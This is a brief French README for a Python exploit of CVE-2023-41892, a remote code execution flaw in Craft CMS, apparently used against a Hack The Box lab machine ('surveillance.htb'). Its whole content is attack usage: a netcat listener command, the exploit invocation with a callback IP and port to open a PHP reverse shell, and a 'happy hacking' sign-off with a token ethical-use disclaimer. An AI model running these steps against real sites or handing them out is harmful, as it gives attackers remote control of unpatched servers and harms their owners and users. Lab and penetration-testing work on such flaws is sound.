
CVE-2023-41892 Reverse Shell
Ce script Python exploite la vulnérabilité d'exécution de code à distance (CVE-2023-41892) du Craft CMS, un système de gestion de contenu populaire. Les versions entre 4.0.0-RC1 et 4.4.14 sont affectées par cette vulnérabilité, permettant à des attaquants d'exécuter du code arbitraire à distance, comme un reverse shell PHP.
Commencez par démarrer un listener netcat dans un autre shell :
nc -nlvp 1234
Ensuite, vérifiez votre adresse IP et lancez l'exploit :
python3 exploit.py -r 10.10.16.47 -p 1234 http://surveillance.htb
Bon hacking avec votre tout nouveau reverse shell !
Ce code est destiné uniquement à des fins de hacking éthique et ne doit pas être utilisé pour des activités malveillantes !
Merci à to016 pour le code original que l'on peut trouver dans ce Gist